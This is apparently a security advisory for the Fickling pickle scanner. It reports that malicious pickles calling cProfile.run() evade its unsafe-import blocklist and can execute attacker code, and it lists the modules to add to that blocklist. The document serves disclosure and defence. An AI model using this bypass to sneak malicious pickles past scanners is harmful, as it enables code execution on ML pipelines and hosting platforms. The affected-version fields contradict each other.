### Vulnerability Key Information - **Vulnerability Name:** Fickling Blocklist Bypass: cProfile.run() - **Severity:** High - **Affected Versions:** = v0.1.7 - **CVE ID:** None - **Weaknesses:** CWE-184, CWE-502 #### Vulnerability Description Fickling versions up to v0.1.6 do not treat Python’s cProfile module as unsafe. As a result, malicious pickles using `cProfile.run()` are flagged as "SUSPICIOUS" rather than "OVERLY_MALICIOUS". If users rely on Fickling’s output to determine whether a pickle is safe to deserialize, this misclassification could lead to execution of attacker-controlled code on the system. #### Impact Any process or product using Fickling as a security gateway for pickle deserialization is affected. #### Vulnerability Details The `cProfile` module is not included in Fickling’s blacklist of unsafe module imports, specifically in the file `fickling/analysis.py`. This is the same root cause as CVE-2025-67748 (pty) and CVE-2025-67747 (marshal/types). #### Exploitation Steps Steps include creating a malicious pickle, analyzing it with Fickling to confirm the vulnerability, and loading the pickle to demonstrate remote code execution (RCE) capability. #### Remediation Recommendation Add the following modules to the unsafe import blacklist in `fickling/analysis.py`: - cProfile - cProfile.run - cProfile.runcx - _lsprof (underlying C module) #### Scope of Impact Any user or system relying on Fickling to check the safety of pickle files, including but not limited to: - ML model validation pipelines - Model hosting platforms (e.g., Hugging Face, MLflow, etc.) - Security scanning tools using Fickling - CI/CD pipelines validating pickle artifacts